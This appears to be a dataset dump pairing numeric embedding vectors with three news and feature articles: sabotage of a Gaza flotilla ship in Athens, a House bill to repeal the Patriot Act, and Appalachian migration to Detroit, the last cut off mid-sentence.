[ 0.029999392107129097, 0.00035906906123273075, 0.04105984792113304, 0.03768668323755264, 0.051112160086631775, 0.01989452913403511, 0.04563286900520325, -0.06232140213251114, 0.047859158366918564, -0.041728053241968155, -0.009339387528598309, 0.03552404046058655, 0.1043417677283287, 0.017438026145100594, 0.00144965888466686, -0.01511358842253685, 0.03551133722066879, -0.040249716490507126, -0.051239416003227234, 0.023224126547574997, -0.06478424370288849, 0.07593046873807907, 0.0669645369052887, 0.008192246779799461, 0.029166895896196365, 0.02663447894155979, 0.008722336031496525, -0.03572489321231842, -0.04395637288689613, 0.01684010587632656, 0.027123166248202324, -0.01024156529456377, -0.03424474969506264, 0.0593203566968441, 0.02268480323255062, -0.027620885521173477, 0.007556386291980743, 0.06025462597608566, 0.05386895313858986, 0.0638284981250763, 0.09475808590650558, -0.05704208463430405, 0.034028440713882446, -0.0028529244009405375, -0.007219992578029633, -0.03272147849202156, 0.0021266669500619173, -0.022847512736916542, -0.0022258737590163946, 0.017118612304329872, -0.04359957203269005, -0.0474991649389267, -0.01792191155254841, 0.018707258626818657, 0.0698387548327446, 0.023121431469917297, -0.13967423141002655, 0.09845471382141113, 0.014868386089801788, 0.07631944119930267, -0.013103637844324112, -0.001127302530221641, 0.008621875196695328, 0.013576221652328968, 0.017897171899676323, 0.04913225397467613, 0.004090669099241495, -0.0752461776137352, 0.01795150712132454, 0.02205934375524521, -0.027101870626211166, 0.021609727293252945, 0.021975072100758553, -0.035205986350774765, -0.010453651659190655, -0.07535047084093094, 0.14412060379981995, 0.06357935070991516, 0.017425602301955223, -0.0130776297301054, 0.024891352280974388, -0.057842057198286057, -0.03369186073541641, -0.07855429500341415, 0.05878597870469093, -0.13297921419143677, -0.04556109756231308, -0.037686653435230255, 0.0006029615178704262, 0.05139733478426933, -0.05008431524038315, -0.04930717498064041, 0.10839845985174179, 0.006422899197787046, 0.05594197288155556, -0.03907294198870659, -0.00837657693773508, -0.0029190497007220984, -0.02862921729683876, 0.07162000238895416, 0.06151222810149193, 0.014008654281497002, -0.02858523651957512, 0.034228406846523285, 0.003828597255051136, -0.029962990432977676, -0.0525842122733593, 0.03934647515416145, -0.05856107547879219, 0.0015281992964446545, -0.06565199047327042, 0.05854978784918785, -0.0038481394294649363, -0.09673310816287994, -0.031874995678663254, 0.04093286022543907, 0.042750999331474304, 0.014493555761873722, -0.005072086118161678, 0.010205978527665138, -0.0499926395714283, -0.013295680284500122, 0.042208991944789886, -0.009184171445667744, 0.03284222632646561, -0.022451795637607574, 0.006075846962630749, -4.090697841165002e-34, 0.05648917704820633, -0.04099346697330475, -0.04191863536834717, 0.01576399803161621, 0.024833418428897858, 0.10741506516933441, -0.10678480565547943, -0.08150818198919296, 0.059375081211328506, -0.10988642275333405, -0.018215736374258995, 0.04962899535894394, 0.02431417442858219, 0.008909839205443859, -0.00545109249651432, 0.0481475293636322, -0.05018743872642517, 0.009010759182274342, -0.029097985476255417, -0.021231722086668015, 0.062414102256298065, -0.07963674515485764, 0.011160701513290405, 0.01600673608481884, 0.07147720456123352, 0.017534861341118813, 0.08811890333890915, -0.010678134858608246, -0.029314078390598297, 0.017588376998901367, -0.14412067830562592, 0.03720620274543762, 0.037567973136901855, -0.008817587979137897, -0.015107940882444382, -0.018521003425121307, 0.011345128528773785, -0.04599373787641525, -0.011330015026032925, -0.03019467368721962, -0.07797981798648834, 0.09534168988466263, 0.0015272999880835414, -0.010986290872097015, -0.010695378296077251, 0.02288331650197506, 0.07279506325721741, 0.008532621897757053, -0.025984985753893852, 0.016319885849952698, 0.05694084241986275, 0.0213945135474205, 0.04363720864057541, -0.030490368604660034, -0.08960191905498505, 0.023711707442998886, -0.005925383418798447, -0.00914448406547308, 0.052170053124427795, -0.04685716703534126, 0.07227619737386703, -0.011666995473206043, -0.009980340488255024, -0.015504417940974236, 0.04403166472911835, 0.09624651819467545, -0.0994940921664238, 0.03446848317980766, -0.058301422744989395, -0.01614651083946228, 0.06047847867012024, -0.0006563617498613894, 0.05643180012702942, 0.0016314554959535599, -0.08994434773921967, 0.031163042411208153, -0.045559074729681015, -0.0735592171549797, 0.022073905915021896, 0.03795643150806427, 0.029632775112986565, -0.05512272194027901, 0.08427154272794724, -0.051344066858291626, -0.0353318490087986, 0.021700721234083176, 0.031357936561107635, -0.012857754714787006, 0.003920186776667833, 0.050293296575546265, -0.04427758604288101, 0.09041668474674225, 0.0485226996243, -0.009371750056743622, -0.018734794110059738, -1.3613965783529245e-33, -0.09317375719547272, 0.03116171807050705, -0.07174926996231079, 0.0010954777244478464, -0.0110749127343297, -0.02065054327249527, 0.049064792692661285, -0.0027688757982105017, 0.011032297275960445, -0.06798998266458511, -0.01731693744659424, -0.059532225131988525, -0.038531769067049026, -0.0003680788504425436, -0.09380685538053513, -0.0073545463383197784, 0.04272298887372017, -0.06667692214250565, -0.0378609336912632, 0.06323201954364777, 0.11203660070896149, -0.006519423797726631, -0.1134137362241745, 0.0224384143948555, 0.01616968773305416, -0.038277897983789444, 0.06710932403802872, -0.021947888657450676, -0.06487391889095306, 0.007214932702481747, -0.0608474500477314, 0.043439872562885284, -0.01697004772722721, 0.04134022444486618, 0.042701177299022675, 0.1699886918067932, 0.0037832390516996384, -0.051673904061317444, -0.10408724099397659, 0.016095807775855064, 0.1024986207485199, 0.004853755235671997, -0.06484533101320267, -0.017827533185482025, -0.05501367151737213, 0.1140618547797203, -0.08458773046731949, 0.05184506997466087, -0.0814143642783165, -0.002382800681516528, 0.00713501637801528, 0.0026787922251969576, -0.08746442198753357, 0.07213525474071503, -0.04944299906492233, 0.042122237384319305, -0.052881576120853424, -0.03593691065907478, 0.004673412535339594, -0.02363765239715576, -0.032021842896938324, -0.03893256187438965, -0.04063083603978157, -0.19048677384853363, 0.011318443343043327, 0.02508951909840107, 0.05204569548368454, 0.02756558358669281, 0.13093282282352448, 0.015841567888855934, 0.03952280804514885, -0.08602773398160934, -0.07230063527822495, -0.09365186095237732, 0.08488164842128754, 0.11741011589765549, -0.045521363615989685, 0.049300841987133026, -0.040756579488515854, 0.0525369793176651, 0.041632432490587234, -0.042247965931892395, 0.024377325549721718, -0.0206866804510355, 0.029247665777802467, 0.03452754020690918, 0.0348474495112896, -0.03431479260325432, -0.02150246873497963, 0.07054335623979568, -0.06033585965633392, -0.009090899489820004, -0.06707078218460083, 0.04442351311445236, -0.026358217000961304, -4.7891436594227343e-8, -0.04333062097430229, -0.05195112153887749, -0.06303845345973969, -0.011730575934052467, 0.0055281901732087135, -0.006397672463208437, 0.008707958273589611, -0.1002669557929039, -0.009649621322751045, -0.04001948609948158, 0.00453966436907649, -0.04683541879057884, -0.06255082041025162, -0.008859201334416866, -0.000150804640725255, 0.006836209446191788, -0.011693178676068783, 0.016246449202299118, -0.0071091558784246445, -0.004844394978135824, -0.035993680357933044, 0.03526858985424042, -0.032887283712625504, 0.0656425729393959, 0.08044695109128952, 0.00018060985894408077, -0.07288666069507599, 0.08398155122995377, 0.02367939054965973, 0.002765095792710781, -0.06679943948984146, 0.014038525521755219, -0.03290475159883499, -0.04135614633560181, -0.06736350804567337, 0.0009790793992578983, 0.051704730838537216, 0.041778553277254105, 0.03912649676203728, 0.06664761155843735, -0.053339291363954544, -0.03644315153360367, 0.012295305728912354, 0.06105198338627815, -0.029143281280994415, -0.015586670488119125, -0.03624037280678749, 0.0014061912661418319, -0.015315025113523006, -0.058126334100961685, 0.039744481444358826, -0.0497068427503109, 0.02246227115392685, 0.04650525748729706, 0.07416611909866333, -0.002581977751106024, 0.041517674922943115, -0.06509505212306976, 0.0053676217794418335, 0.005712233018130064, -0.05248937010765076, 0.009696333669126034, -0.08635479211807251, -0.028116388246417046 ]
A ship jointly owned by Swedish, Greek, and Norwegian activists hoping to join a flotilla of activist vessels challenging Israel's economic blockade of Gaza, had its propeller cut while in Athen's harbor today. A spokesman contacted by the Monitor said that the damage was a deliberate act of sabotage. Israel and its allies have been working hard to head off the planned flotilla, which is hoping to enter the waters off Gaza in the next week. Col. (ret) Ann Wright, who's organizing a US vessel named the Audacity of Hope for the flotilla, says her ship has been detained in Athens on spurious charges that it's not seaworthy. She says that charge was made by an Israeli legal group. Now the Juliano is held up. Mikael Löfgren, a spokesman for Ship to Gaza Sweden, says the damage was discovered at 6:30 in the evening Athens time today, and that divers probably cut the propeller in the past 24 hours. "The reports I'm receiving is that it's certain that it was sabotage," says Mr. Löfgren, reached by phone in Sweden. "The propeller and [propeller shaft] has been cut and we have divers that have filmed the damages. Experts have said there’s no doubt" that the damage was deliberate. He says that repairing the damage will take a few days. As to who is responsible, he declined to speculate. "We simply don't know who did it, but it's obviously a hostile act," says Löfgren. Israel has been desperate to stop the flotilla from nearing Gaza. Israel raided a similar flotilla in international waters last year, killing nine pro-Palestinian activists in the process, one of them an American citizen. In the wake of that event, and the international outcry against Israel, Israel eased some of the restrictions on the flow of goods into Gaza. This year, Israel is determined it doesn't get that far. Earlier today, Prime Minister Benjamin Netanyahu's cabinet approve using any means necessary to stop the flotilla from reaching Gaza. The US has also been putting pressure on the activists to hold back. Secretary of State Hillary Clinton characterized the flotilla as hostile in a comment last week. "We think that it's not helpful for there to be flotillas that try to provoke action by entering into Israeli waters and creating a situation in which the Israelis have the right to defend themselves," Clinton said. The flotilla, in fact, says it has no plans to enter Israeli waters, instead planning on transiting through international waters to Gaza's territorial waters. The distinction goes to the heart of their protest. While Israel extends de facto sovereignty over Gaza's coastal waters, penning its fisherman close to shore and preventing any shipping or ferries to run to and from the Strip, it's not their territory under international law. The activists themselves say they want to make the point that peacefully coming and going from Gaza shouldn't be criminalized, insist that they will practice nonviolence in their attempt, and that they'd be delighted to simply sail through unmolested.
[ -0.09724989533424377, 0.06898625940084457, 0.019940529018640518, -0.03581817075610161, 0.11696051061153412, -0.04543772712349892, 0.05688163638114929, 0.006454526912420988, -0.035816844552755356, 0.07612568140029907, 0.04067375138401985, 0.06795143336057663, -0.033452555537223816, 0.04987385869026184, -0.03467161953449249, 0.016516830772161484, 0.0002517342509236187, -0.07269434630870819, -0.10952721536159515, 0.09816254675388336, 0.011395749635994434, 0.04745348170399666, 0.011802281253039837, 0.01834835112094879, 0.08152642846107483, 0.06268401443958282, 0.033908661454916, -0.014875591732561588, -0.006532357539981604, -0.03244801610708237, -0.03244142606854439, 0.05454651266336441, -0.05320384353399277, -0.017318211495876312, 0.07881887257099152, 0.08151832222938538, 0.06473318487405777, -0.08142120391130447, -0.03308643400669098, -0.0639881119132042, 0.03345128521323204, -0.0074147251434624195, -0.0018739259103313088, 0.07717540115118027, -0.07231645286083221, 0.04639293998479843, 0.08815281838178635, -0.03124004788696766, 0.01785733737051487, 0.043289922177791595, -0.06150662526488304, -0.08813025802373886, 0.09973277151584625, -0.10532796382904053, -0.06831412017345428, -0.053484637290239334, 0.002650498179718852, 0.04980136454105377, 0.02328791283071041, -0.01001728419214487, 0.01340094581246376, 0.036821503192186356, -0.0022573363967239857, 0.006122504360973835, 0.017035864293575287, -0.03279046341776848, 0.03489135950803757, 0.0011865553678944707, -0.003957899287343025, 0.03121715970337391, 0.13512800633907318, -0.029412763193249702, -0.023345693945884705, 0.041522614657878876, 0.016056500375270844, -0.026291048154234886, 0.04602555185556412, -0.006529901642352343, 0.0453345961868763, 0.012082290835678577, -0.011639799922704697, -0.11331852525472641, -0.04063035920262337, 0.0034016110002994537, 0.009415226988494396, 0.014626412652432919, -0.002612143289297819, 0.07350730895996094, 0.0653526708483696, -0.008719907142221928, -0.02718363329768181, -0.05509258806705475, 0.03476276248693466, -0.04693608358502388, 0.044598259031772614, 0.031110383570194244, -0.08303665369749069, 0.05847252532839775, -0.02127048186957836, 0.07412401586771011, 0.050913237035274506, 0.09395169466733932, -0.07114075124263763, -0.050510406494140625, -0.033254072070121765, -0.02131301537156105, -0.012069117277860641, -0.006539590656757355, -0.023959185928106308, -0.015093214809894562, -0.032793786376714706, 0.04368141293525696, 0.03438016399741173, -0.023438921198248863, -0.029440484941005707, 0.04084186255931854, -0.0855407565832138, 0.025516830384731293, -0.030458610504865646, -0.0973280817270279, 0.053469229489564896, -0.025154728442430496, 0.064961276948452, 0.05778009444475174, -0.014152590185403824, 0.04298163205385208, -0.024078624323010445, 6.195992611453372e-34, 0.034609876573085785, 0.01305337157100439, -0.03051527589559555, -0.04450149089097977, 0.051496632397174835, -0.0189033392816782, -0.022772811353206635, 0.03765135258436203, -0.03026915341615677, -0.009325181134045124, -0.06293842941522598, -0.09776357561349869, 0.0007498946506530046, -0.07399994879961014, -0.03132703900337219, -0.0519920289516449, 0.09613180160522461, -0.031660307198762894, -0.10032734274864197, -0.018590828403830528, 0.09471037983894348, -0.022015666589140892, -0.01436915248632431, -0.012241019867360592, -0.015177936293184757, -0.039227403700351715, 0.009687083773314953, 0.0440283827483654, 0.04392540827393532, 0.05401293933391571, -0.0825071781873703, 0.004832289647310972, 0.028079666197299957, 0.06250622123479843, 0.01963789202272892, 0.053307682275772095, -0.06543076783418655, -0.03890024498105049, -0.1012493148446083, -0.01859596185386181, 0.015993831679224968, 0.010249254293739796, -0.04050673544406891, 0.07721973210573196, -0.06027854606509209, -0.10834860801696777, 0.011192007921636105, -0.0053779385052621365, 0.04055028781294823, -0.027872761711478233, 0.0420689694583416, 0.007645295467227697, 0.009235760197043419, -0.05150703713297844, -0.022601187229156494, 0.08332622796297073, 0.05117626115679741, 0.06401203572750092, -0.0012702379608526826, -0.05510599538683891, -0.0024977095890790224, 0.0521346852183342, -0.014717965386807919, 0.03986845538020134, 0.01671343296766281, 0.06564448028802872, 0.055164236575365067, -0.050473008304834366, -0.03234124928712845, -0.007487128023058176, -0.03850463032722473, 0.013913514092564583, 0.029624491930007935, 0.019742794334888458, -0.06191804260015488, 0.06797676533460617, -0.0061911423690617085, -0.043055709451436996, 0.019490638747811317, -0.06154400110244751, -0.0617772676050663, -0.013662993907928467, 0.03222193941473961, 0.05232900008559227, -0.08681143820285797, -0.06098933517932892, 0.026572242379188538, 0.0013057078467682004, -0.033605244010686874, -0.013890582136809826, 0.052424222230911255, -0.02380155771970749, 0.036276429891586304, -0.08025664836168289, -0.06720217317342758, -1.538411517578368e-33, -0.05836377292871475, 0.026768771931529045, -0.03899575024843216, -0.03697928786277771, 0.042319342494010925, -0.06953414529561996, 0.04205721244215965, 0.04175066575407982, -0.027168571949005127, -0.04622117429971695, -0.09830199182033539, -0.11418677121400833, -0.015693552792072296, 0.02864719368517399, -0.04552508890628815, 0.02881462499499321, 0.09652578830718994, 0.05761615186929703, 0.05635042116045952, -0.07581315189599991, 0.013087128289043903, 0.0066281454637646675, 0.10115274786949158, 0.02695086970925331, -0.026869243010878563, 0.009560970589518547, 0.13799208402633667, -0.016039356589317322, -0.0485309362411499, -0.06814903765916824, 0.004195393528789282, -0.0005713174468837678, -0.03962285816669464, 0.015389665961265564, -0.03401884436607361, 0.09471476823091507, -0.0023948531597852707, 0.08149310946464539, -0.02586202882230282, -0.09891233593225479, -0.024277951568365097, 0.01900435797870159, -0.08527689427137375, 0.07195436209440231, -0.0881749838590622, -0.039980269968509674, 0.005771524738520384, 0.03196098655462265, 0.009724047034978867, -0.04266614466905594, -0.058270614594221115, 0.03959742933511734, 0.10187660157680511, -0.0005094328080303967, 0.06658865511417389, -0.03970349580049515, -0.011707840487360954, -0.035315919667482376, 0.024986056610941887, 0.030073238536715508, 0.018142977729439735, 0.017387140542268753, -0.020337369292974472, 0.07186208665370941, 0.02986113913357258, -0.022726330906152725, -0.05791677534580231, 0.012209219858050346, -0.05657275393605232, 0.07042102515697479, 0.04467884078621864, 0.049114640802145004, -0.06676533818244934, 0.026429785415530205, 0.01631883531808853, -0.03634670376777649, -0.13672295212745667, 0.0011862032115459442, -0.010621219873428345, 0.05862729251384735, 0.05574583262205124, -0.053357284516096115, -0.10974033176898956, 0.05096638202667236, 0.07798243314027786, -0.05236149579286575, 0.07003931701183319, 0.06455247849225998, 0.051967550069093704, -0.037898365408182144, 0.0038374888245016336, -0.030866948887705803, -0.03904373198747635, 0.10528645664453506, 0.029398487880825996, -5.381404477589058e-8, 0.04469009116292, -0.03494269400835037, -0.026572320610284805, 0.018189938738942146, 0.04314616695046425, -0.027651246637105942, -0.0026827517431229353, 0.041871577501297, -0.02883073128759861, -0.022414037957787514, -0.047598231583833694, -0.05980098992586136, -0.0808790996670723, -0.05501439794898033, -0.016970129683613777, -0.019927099347114563, 0.032028522342443466, 0.03387904167175293, -0.05218375474214554, -0.04846852645277977, 0.052744995802640915, 0.0033139814622700214, -0.06087416782975197, -0.01587727665901184, -0.045580293983221054, 0.03519270941615105, -0.018075773492455482, 0.010745286010205746, -0.005335914436727762, -0.030643904581665993, -0.1013932153582573, -0.0247495099902153, -0.0590895339846611, 0.01037023775279522, -0.09164219349622726, 0.015424484387040138, -0.029908793047070503, 0.013303370214998722, -0.012339990586042404, 0.058803193271160126, -0.035240743309259415, 0.1224360466003418, 0.03242265060544014, 0.07933881133794785, 0.06597187370061874, 0.036546025425195694, 0.03618434816598892, -0.08316748589277267, -0.0042078252881765366, -0.05996181443333626, 0.07181639224290848, -0.04197777807712555, 0.000761534902267158, 0.091588094830513, 0.01055834162980318, 0.05014657974243164, -0.049688201397657394, 0.018419593572616577, -0.002402538899332285, 0.037922170013189316, 0.005959896370768547, -0.015707796439528465, 0.03354348614811897, 0.04286853224039078 ]
A House bill that would fundamentally disassemble the Patriot Act has begun its course through the House, thanks to a bipartisan duo calling for an end to “dragnet surveillance” in the United States. Introduced Tuesday by Reps. Mark Pocan (D-Wisc.) and Thomas Massie (R-Ky.), the Surveillance State Repeal Act would, as its name suggests, repeal the Patriot Act along with the FISA Amendments Act of 2008. The bill would also prohibit the government from compelling Internet service providers to secretly permit access to their data streams through the issuance of secret warrants, a practice currently enabled by 2008 revisions to the Foreign Intelligence Surveillance Act of 1978. “The warrantless collection of millions of personal communications from innocent Americans is a direct violation of our constitutional right to privacy,” Pocan said via a release on his congressional website. “Revelations about the NSA’s programs reveal the extraordinary extent to which the program has invaded Americans’ privacy. I reject the notion that we must sacrifice liberty for security- we can live in a secure nation which also upholds a strong commitment to civil liberties. This legislation ends the NSA’s dragnet surveillance practices, while putting provisions in place to protect the privacy of American citizens through real and lasting change.” While the bill has little chance of making it to President Obama’s desk so he can veto it, its several features may serve as a parts bin for reform efforts as the Patriot Act comes due for another round of reauthorizations in June. “[A]dvocates might be hoping that their firm opposition to government spying will seem more attractive in coming weeks, as lawmakers race to beat a June 1 deadline for reauthorizing portions of the Patriot Act,” The Hill reported Tuesday. “Reformers have eyed that deadline as their last best chance for reforming some controversial NSA programs, after an effort failed in the Senate last year.”
[ -0.0841035470366478, -0.0148636968806386, 0.03875626623630524, -0.03596469387412071, 0.0436740517616272, 0.011134309694170952, 0.02874152548611164, -0.060009974986314774, 0.01661420799791813, -0.01827004738152027, 0.0470697320997715, 0.1768709421157837, 0.03499197959899902, -0.05121343955397606, 0.007256758864969015, 0.0022363574244081974, 0.021345632150769234, -0.03375503793358803, -0.0369175523519516, 0.052875738590955734, 0.05488007888197899, 0.032546717673540115, 0.029850903898477554, 0.03678038716316223, -0.1041582003235817, 0.0629519447684288, 0.03870036453008652, -0.10592620819807053, -0.11604765802621841, -0.049075547605752945, 0.08568371832370758, -0.036091964691877365, 0.012258714064955711, 0.03261723741889, 0.0015672267181798816, -0.10356521606445312, 0.07927710562944412, -0.010394719429314137, 0.06084234640002251, -0.021464303135871887, 0.026132669299840927, -0.10018379986286163, -0.021171394735574722, 0.06663596630096436, -0.023755842819809914, 0.08270378410816193, 0.04434681683778763, -0.006670976988971233, -0.012023838236927986, -0.018673652783036232, -0.01555316336452961, 0.028145164251327515, -0.053306374698877335, 0.11821908503770828, -0.007569129578769207, -0.09409386664628983, -0.052248451858758926, 0.011789681389927864, 0.028926340863108635, 0.031536150723695755, 0.042582329362630844, -0.04726652055978775, 0.011781943030655384, 0.01926819421350956, -0.05828351154923439, 0.0023760490585118532, 0.012809190899133682, -0.05895182117819786, 0.05636897310614586, 0.003470023861154914, -0.012612112797796726, 0.10070019215345383, 0.0011157484259456396, 0.08645709604024887, 0.012311207130551338, 0.021121853962540627, 0.015895342454314232, -0.014346675015985966, 0.05420801416039467, -0.0696980282664299, 0.06469964981079102, -0.05664544925093651, 0.07196205109357834, 0.03083663620054722, 0.044447239488363266, -0.010682567954063416, -0.11801445484161377, -0.02293461374938488, 0.025557901710271835, -0.04144664108753204, -0.022679403424263, -0.01240558922290802, 0.02712460421025753, 0.013436190783977509, 0.025978660210967064, -0.06605031341314316, 0.01688038930296898, -0.05186546966433525, -0.08001095801591873, 0.06151968613266945, -0.023113984614610672, 0.01813521981239319, -0.04158356785774231, -0.009514564648270607, -0.0024031938519328833, 0.005467316601425409, 0.00572846969589591, 0.009843844920396805, 0.024743108078837395, 0.0662342831492424, 0.055523160845041275, 0.012527836486697197, -0.018306411802768707, -0.07115557789802551, 0.03961876779794693, -0.040027517825365067, 0.049849219620227814, 0.12076880782842636, 0.04231925308704376, -0.012948171235620975, -0.009150859899818897, 0.10486046969890594, 0.007982922717928886, 0.020069804042577744, 0.021417533978819847, -0.05628318339586258, -0.04200219735503197, 2.2484262685223535e-33, -0.07853983342647552, 0.021265920251607895, -0.04005533456802368, -0.08068474382162094, -0.022986263036727905, -0.04253949224948883, 0.02146543562412262, -0.038822468370199203, 0.037405747920274734, 0.038704127073287964, 0.028386719524860382, -0.027586573734879494, 0.011709178797900677, 0.03413757309317589, 0.028587209060788155, -0.003071100451052189, -0.019194304943084717, 0.05990684777498245, 0.07152894139289856, -0.013477277010679245, 0.059640273451805115, -0.0238972045481205, 0.04883731156587601, 0.029999028891324997, 0.023764993995428085, -0.04842301830649376, 0.024925723671913147, -0.04309791699051857, 0.028214257210493088, 0.0014854578766971827, -0.02927745319902897, 0.07462168484926224, 0.045616570860147476, 0.054758064448833466, 0.07613207399845123, -0.058852434158325195, 0.012547114863991737, -0.08373451977968216, 0.03993097320199013, 0.005160439759492874, -0.0072421240620315075, 0.014696166850626469, -0.022041816264390945, -0.050462957471609116, 0.009477819316089153, -0.049836743623018265, 0.006349120754748583, 0.05674375221133232, -0.01962994411587715, -0.04210058972239494, 0.03425636887550354, -0.005490986164659262, -0.1279696673154831, -0.0627758577466011, -0.11186613887548447, 0.02083267830312252, -0.023198917508125305, -0.004259486682713032, 0.06873980909585953, -0.033578868955373764, 0.02810526080429554, 0.06014067307114601, 0.014902600087225437, -0.005670747719705105, -0.08081092685461044, -0.046284571290016174, -0.062354981899261475, 0.03662792220711708, -0.039995621889829636, 0.05639941990375519, 0.01239132322371006, -0.014592857100069523, -0.0341523177921772, 0.0020876959897577763, -0.057249896228313446, -0.00013608159497380257, 0.008648691698908806, 0.03863931819796562, 0.054127804934978485, -0.03662613779306412, -0.05833950638771057, 0.0041268509812653065, 0.12283002585172653, 0.02546391263604164, -0.04531668499112129, 0.004302919842302799, -0.0036206687800586224, 0.03080163523554802, 0.03006626106798649, 0.06158767640590668, -0.023092998191714287, -0.02098444290459156, -0.0813797190785408, 0.02686350606381893, -0.04905327782034874, -3.7669473196588545e-33, -0.14469954371452332, -0.05395985767245293, -0.08392483741044998, 0.036421313881874084, -0.05545837804675102, -0.016704782843589783, -0.045677993446588516, -0.0052222502417862415, 0.03855231776833534, -0.019798628985881805, -0.01746462471783161, 0.00324902287684381, 0.0015786110889166594, 0.002958640456199646, 0.011787045747041702, -0.005404179450124502, 0.017528248950839043, -0.02389676868915558, -0.055444516241550446, 0.0028119790367782116, -0.0728592500090599, 0.01973959431052208, -0.03586664795875549, 0.04262145981192589, 0.0194558072835207, -0.06546829640865326, -0.0004795757122337818, 0.015319202095270157, 0.15292422473430634, 0.03782517835497856, -0.014980383217334747, -0.04498205706477165, -0.008571685291826725, 0.07561060786247253, -0.02637239545583725, 0.020105401054024696, 0.08955122530460358, 0.01765482872724533, -0.034801602363586426, -0.032173722982406616, 0.055624473839998245, 0.025624144822359085, -0.06400557607412338, -0.0057396055199205875, -0.0882970318198204, 0.04738525673747063, 0.014368759468197823, 0.10505476593971252, -0.10921105742454529, -0.04517475888133049, -0.012212797068059444, 0.00299752876162529, 0.0056553496979177, -0.024091321974992752, -0.08114971965551376, 0.08356820791959763, 0.07321804016828537, 0.0001345067867077887, 0.1081964373588562, 0.0005582079757004976, 0.014269883744418621, -0.009833185002207756, -0.08487662672996521, -0.08216847479343414, 0.04840811714529991, 0.05427676811814308, -0.03723219782114029, 0.025470076128840446, -0.0029700687155127525, 0.018237661570310593, 0.062445010989904404, -0.14736402034759521, -0.03699658811092377, -0.05592833086848259, 0.06242314353585243, 0.005287317559123039, 0.019847339019179344, -0.004165058955550194, -0.11924666166305542, 0.08719993382692337, 0.054421670734882355, -0.06126618757843971, -0.06576047092676163, -0.0620327889919281, 0.0938495621085167, 0.00006950616807444021, 0.029729727655649185, -0.07008560746908188, -0.07546193897724152, 0.039648111909627914, -0.08437512069940567, -0.019439751282334328, -0.11404305696487427, -0.0017111911438405514, -0.008483698591589928, -5.1795861821801736e-8, 0.0016016587615013123, -0.010119756683707237, -0.038952380418777466, 0.017592167481780052, 0.05123409256339073, -0.00971931777894497, -0.007608233951032162, 0.026377519592642784, -0.034910786896944046, -0.07464559376239777, 0.11267527937889099, -0.07722437381744385, -0.011014895513653755, -0.013033831492066383, -0.00547385448589921, 0.03711436316370964, 0.013054259121418, -0.020943518728017807, 0.008549508638679981, 0.06317528337240219, -0.05724717676639557, -0.02814902551472187, -0.055949777364730835, 0.00592710031196475, 0.029741378501057625, 0.0944811999797821, 0.006842512171715498, 0.01853863336145878, 0.05852583050727844, 0.07220666110515594, -0.023682445287704468, 0.02238668128848076, -0.021127909421920776, 0.0372452549636364, -0.051268842071294785, 0.021222034469246864, -0.012985777109861374, 0.0036808629520237446, 0.05276200920343399, 0.046426739543676376, 0.019415011629462242, 0.017663927748799324, 0.010487272404134274, 0.06124795228242874, -0.013198127038776875, -0.028131766244769096, -0.037377338856458664, -0.07781296968460083, 0.06895933300256729, -0.005681804846972227, -0.015762295573949814, -0.056157249957323074, 0.060396380722522736, 0.09260731190443039, 0.016542093828320503, 0.03165344521403313, 0.0764518529176712, -0.09950481355190277, -0.08223050087690353, 0.03687475621700287, 0.06809332966804504, -0.013357207179069519, 0.0007336032576858997, -0.026377025991678238 ]
This is part one of a two-article series looking at the legacy of Appalachian culture in Detroit. The first I heard of the 20th century Appalachian influx into Detroit—the "Hillbilly Highway" migration, as it's often called—was my own move here in 2013. This was an Appalachian migration of sorts, as I was born and raised in West Virginia, though moved to Detroit from Brooklyn. I was part of a long line, it seemed: between 1940 and 1960, seven million Appalachians left their home. During World War II, men from all across the South came north to work in the war factories, and then, when Appalachian coal jobs decreased due to automation, to booming industrial cities like Chicago and Detroit. I became curious about these Appalachians who'd arrived decades before I had, about what their experiences were like and where they ended up. The Hillbilly Highway was an out-migration with both push and pull. They also believed its workers to be "safe," or unlikely to unionize. It also helped that, according to Thomas Klug, Marygrove College history professor and director of the college's Institute for Detroit Studies, many Southern migrants planned to work up north then move home with their earnings. This plan dovetailed with auto companies' needs for seasonal workers to supplement their core staff of settled Detroiters, a more diverse group of higher-skilled workers and homeowners. "Employers want a highly mobile force that they can hire and fire, and when you fire them they leave, and when you want them, they come back," says Klug. "It fits in perfectly with the migrant strategy. You work really hard and make a lot of money relative to the sought, you take that money and go back, and maybe you can set up a gas station or buy a piece of land." In the Midwest as a whole, however—according to " Some migrants chose to leave Appalachia behind completely. One West Virginia-born couple interviewed in "Appalachian Odyssey" West Virginia University College of Pharmacy Guests at Parke-Davis Home Laboratories in Detroit (1959) Reading "Appalachian Odyssey" and the media of the time suggests a rough transition. The representation of Appalachia, and the South more generally, in popular media, tended to sketch a freakish "other." In a 1935 Harper's Magazine article, "The Hillbillies Invade Chicago," writer Albert Votaw describes Appalachian migrants as "clannish, proud, disorderly, untamed to urban ways," confounding "all notions of racial, religious and cultural purity." The same year, an article in The Nation, "The Hill-Billies Come to Detroit," refers to the population as "white trash or a little better." These "hill-billies," writes Louis Adamic, "with their extremely low standard of living and lack of acquaintance with modern plumbing, are looked down upon by all but the most intelligent local workers, both native and foreign born; they are despised also—indeed, mainly—because they take employment away from the old-time automotive workers." A 1934 Detroit News Perhaps most shocking is how even professionals in Appalachia itself contributed to the idea that theirs was a lifestyle out of sync with the times. The Council of the Southern Mountains, for example, sponsored speakers to address a group of city professionals "about the 'strangers' entering their communities," and mountain people's "peculiar ways" were explained in workshops in Cincinnati and Chicago. According to the literature, Appalachians were never welcomed in their new Northern homes. So I expected to hear stories of persecution and slow acceptance from old-timers. But the reality of Appalachians entering Detroit, as reality tends to be, is more complicated. A supportive community Nancy McNiven-Glenn, the former proprietor of North Corktown's Nancy Whiskey bar, and Carole Baker, a lifelong Detroiter who still resides in the Woodbridge neighborhood where she was born, recall a happy time with their Southern neighbors. In Baker's colorful living room, the two friends describe—often while finishing each other's thoughts—a convivial, supportive community. Nancy McNiven-Glenn "If you talk to most any Detroiter, their grandma and grandpa came from down south during that time," McNiven-Glenn says. "There's a lot of Kentucky ties here. Tennessee, too." Her father, a North Carolina native, moved the family north to work in the war factories. In the 1950s and '60s, Baker recalls, many Appalachians and Southerners lived in large apartment buildings on Charlotte and Peterboro streets. They were religious and clannish, according to both women, often living in the same large apartment buildings. Says Baker, "They'd bring cornbread up to the second floor and mama watched the—" "—young 'uns," McNiven-Glenn says. "—on the first floor while that one went to work, and that's just the way it was." McNiven-Glenn laughs remembering the camaraderie she shared with a Kentucky-born bar owner in the neighborhood. "He had some rough customers. There'd be a few thrown downs in there once or twice a week," she says. One day, he called her up. "He said, 'Nancy!'"—she mimicked a high-pitched Southern twang—"'I'm about starvin' myself and I can't go off and leave this bar. What'd you cook for lunch?' I 